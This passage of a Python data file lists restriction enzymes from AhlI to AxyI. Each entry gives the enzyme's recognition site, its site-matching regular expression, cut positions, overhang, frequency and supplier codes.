}
rest_dict['AhlI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCYYGAC'),
'compsite': '(?=(?P<AhyRBAHI>GC[CT][CT]GAC))|(?=(?P<AhyRBAHI_as>GTC[AG][AG]GC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCYYGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AhyRBAHI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'YAAMGAG'),
'compsite': '(?=(?P<AhyYL17I>[CT]AA[AC]GAG))|(?=(?P<AhyYL17I_as>CTC[GT]TT[AG]))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'YAAMGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AhyYL17I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTC'),
'compsite': '(?=(?P<AjiI>CACGTC))|(?=(?P<AjiI_as>GACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AjiI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCWGG'),
'compsite': '(?=(?P<AjnI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AjnI'] = _temp()
def _temp():
return {
'charac': (-7, -26, 25, 6, 'GAANNNNNNNTTGG'),
'compsite': '(?=(?P<AjuI>GAA.......TTGG))|(?=(?P<AjuI_as>CCAA.......TTC))',
'dna': None,
'freq': 16384.0,
'fst3': -26,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 6,
'scd5': 25,
'site': 'GAANNNNNNNTTGG',
'size': 14,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AjuI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CACNNNNGTG'),
'compsite': '(?=(?P<AleI>CAC....GTG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNNGTG',
'size': 10,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AleI'] = _temp()
def _temp():
return {
'charac': (-10, -24, 24, 10, 'GCANNNNNNTGC'),
'compsite': '(?=(?P<AlfI>GCA......TGC))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 24,
'site': 'GCANNNNNNTGC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AlfI'] = _temp()
def _temp():
return {
'charac': (-7, -25, 25, 7, 'GAACNNNNNNTCC'),
'compsite': '(?=(?P<AloI>GAAC......TCC))|(?=(?P<AloI_as>GGA......GTTC))',
'dna': None,
'freq': 16384.0,
'fst3': -25,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 25,
'site': 'GAACNNNNNNTCC',
'size': 13,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AloI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AGCT'),
'compsite': '(?=(?P<AluBI>AGCT))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCT',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AluBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AGCT'),
'compsite': '(?=(?P<AluI>AGCT))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCT',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['AluI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GWGCWC'),
'compsite': '(?=(?P<Alw21I>G[AT]GC[AT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'WGCW',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GWGCWC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Alw21I'] = _temp()
def _temp():
return {
'charac': (6, 5, None, None, 'GTCTC'),
'compsite': '(?=(?P<Alw26I>GTCTC))|(?=(?P<Alw26I_as>GAGAC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Alw26I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTGCAC'),
'compsite': '(?=(?P<Alw44I>GTGCAC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGCAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J'),
}
rest_dict['Alw44I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAAYNNNNNRTG'),
'compsite': '(?=(?P<AlwFI>GAAA[CT].....[AG]TG))|(?=(?P<AlwFI_as>CA[CT].....[AG]TTTC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAAYNNNNNRTG',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AlwFI'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GGATC'),
'compsite': '(?=(?P<AlwI>GGATC))|(?=(?P<AlwI_as>GATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AlwI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CAGNNNCTG'),
'compsite': '(?=(?P<AlwNI>CAG...CTG))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGNNNCTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AlwNI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<Ama87I>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Ama87I'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'GCTCCA'),
'compsite': '(?=(?P<AmaCSI>GCTCCA))|(?=(?P<AmaCSI_as>TGGAGC))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AmaCSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GATCNAC'),
'compsite': '(?=(?P<Aod1I>GATC.AC))|(?=(?P<Aod1I_as>GT.GATC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATCNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Aod1I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<Aor13HI>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['Aor13HI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGCGCT'),
'compsite': '(?=(?P<Aor51HI>AGCGCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCGCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['Aor51HI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GGCC'),
'compsite': '(?=(?P<AoxI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AoxI'] = _temp()
def _temp():
return {
'charac': (8, -8, None, None, 'GCANNNNNTGC'),
'compsite': '(?=(?P<ApaBI>GCA.....TGC))',
'dna': None,
'freq': 4096.0,
'fst3': -8,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCANNNNNTGC',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['ApaBI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GGGCCC'),
'compsite': '(?=(?P<ApaI>GGGCCC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGCCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['ApaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTGCAC'),
'compsite': '(?=(?P<ApaLI>GTGCAC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGCAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('C', 'K', 'N'),
}
rest_dict['ApaLI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCWGC'),
'compsite': '(?=(?P<ApeKI>GC[AT]GC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'CWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCWGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['ApeKI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RAATTY'),
'compsite': '(?=(?P<ApoI>[AG]AATT[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RAATTY',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['ApoI'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'ATCGAC'),
'compsite': '(?=(?P<ApyPI>ATCGAC))|(?=(?P<ApyPI_as>GTCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['ApyPI'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'GCCGNAC'),
'compsite': '(?=(?P<AquII>GCCG.AC))|(?=(?P<AquII_as>GT.CGGC))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AquII'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'GAGGAG'),
'compsite': '(?=(?P<AquIII>GAGGAG))|(?=(?P<AquIII_as>CTCCTC))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AquIII'] = _temp()
def _temp():
return {
'charac': (26, 17, None, None, 'GRGGAAG'),
'compsite': '(?=(?P<AquIV>G[AG]GGAAG))|(?=(?P<AquIV_as>CTTCC[CT]C))',
'dna': None,
'freq': 8192.0,
'fst3': 17,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGGAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AquIV'] = _temp()
def _temp():
return {
'charac': (-8, -26, 24, 6, 'GACNNNNNNTTYG'),
'compsite': '(?=(?P<ArsI>GAC......TT[CT]G))|(?=(?P<ArsI_as>C[AG]AA......GTC))',
'dna': None,
'freq': 8192.0,
'fst3': -26,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 6,
'scd5': 24,
'site': 'GACNNNNNNTTYG',
'size': 13,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['ArsI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCGCGCC'),
'compsite': '(?=(?P<AscI>GGCGCGCC))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCGCC',
'size': 8,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AscI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATTAAT'),
'compsite': '(?=(?P<AseI>ATTAAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTAAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'N'),
}
rest_dict['AseI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GATC'),
'compsite': '(?=(?P<Asi256I>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Asi256I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<AsiGI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AsiGI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCGATCGC'),
'compsite': '(?=(?P<AsiSI>GCGATCGC))',
'dna': None,
'freq': 65536.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGATCGC',
'size': 8,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['AsiSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGRAGGC'),
'compsite': '(?=(?P<Asp103I>CG[AG]AGGC))|(?=(?P<Asp103I_as>GCCT[CT]CG))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRAGGC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Asp103I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCABCC'),
'compsite': '(?=(?P<Asp114pII>AGCA[CGT]CC))|(?=(?P<Asp114pII_as>GG[ACG]TGCT))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCABCC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Asp114pII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAANNNNTTC'),
'compsite': '(?=(?P<Asp700I>GAA....TTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANNNNTTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['Asp700I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTACC'),
'compsite': '(?=(?P<Asp718I>GGTACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTACC',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['Asp718I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCTAGG'),
'compsite': '(?=(?P<AspA2I>CCTAGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTAGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AspA2I'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'YSCNS'),
'compsite': '(?=(?P<AspBHI>[CT][CG]C.[CG]))|(?=(?P<AspBHI_as>[CG].G[CG][AG]))',
'dna': None,
'freq': 32.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YSCNS',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspBHI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GNGCAAC'),
'compsite': '(?=(?P<AspDUT2V>G.GCAAC))|(?=(?P<AspDUT2V_as>GTTGC.C))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GNGCAAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspDUT2V'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCCCAG'),
'compsite': '(?=(?P<AspJHL3II>CGCCCAG))|(?=(?P<AspJHL3II_as>CTGGGCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspJHL3II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCGC'),
'compsite': '(?=(?P<AspLEI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AspLEI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AAGAACB'),
'compsite': '(?=(?P<AspNIH4III>AAGAAC[CGT]))|(?=(?P<AspNIH4III_as>[ACG]GTTCTT))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AAGAACB',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspNIH4III'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<AspS9I>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AspS9I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTCTCA'),
'compsite': '(?=(?P<AspSLV7III>GTCTCA))|(?=(?P<AspSLV7III_as>TGAGAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspSLV7III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGTRAC'),
'compsite': '(?=(?P<Asu14238IV>CGT[AG]AC))|(?=(?P<Asu14238IV_as>GT[CT]ACG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTRAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Asu14238IV'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCSGG'),
'compsite': '(?=(?P<AsuC2I>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AsuC2I'] = _temp()
def _temp():
return {
'charac': (13, 7, None, None, 'GGTGA'),
'compsite': '(?=(?P<AsuHPI>GGTGA))|(?=(?P<AsuHPI_as>TCACC))',
'dna': None,
'freq': 1024.0,
'fst3': 7,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AsuHPI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<AsuI>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AsuI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<AsuII>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['AsuII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCTAGC'),
'compsite': '(?=(?P<AsuNHI>GCTAGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AsuNHI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGGRAG'),
'compsite': '(?=(?P<AteTI>GGG[AG]AG))|(?=(?P<AteTI_as>CT[CT]CCC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AteTI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<AvaI>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'N', 'Q', 'X'),
}
rest_dict['AvaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<AvaII>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('J', 'N', 'R', 'X'),
}
rest_dict['AvaII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ATGCAT'),
'compsite': '(?=(?P<AvaIII>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AvaIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCTAGG'),
'compsite': '(?=(?P<AvrII>CCTAGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTAGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AvrII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCCRAG'),
'compsite': '(?=(?P<Awo1030IV>GCC[AG]AG))|(?=(?P<Awo1030IV_as>CT[CT]GGC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Awo1030IV'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGG'),
'compsite': '(?=(?P<AxyI>CCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
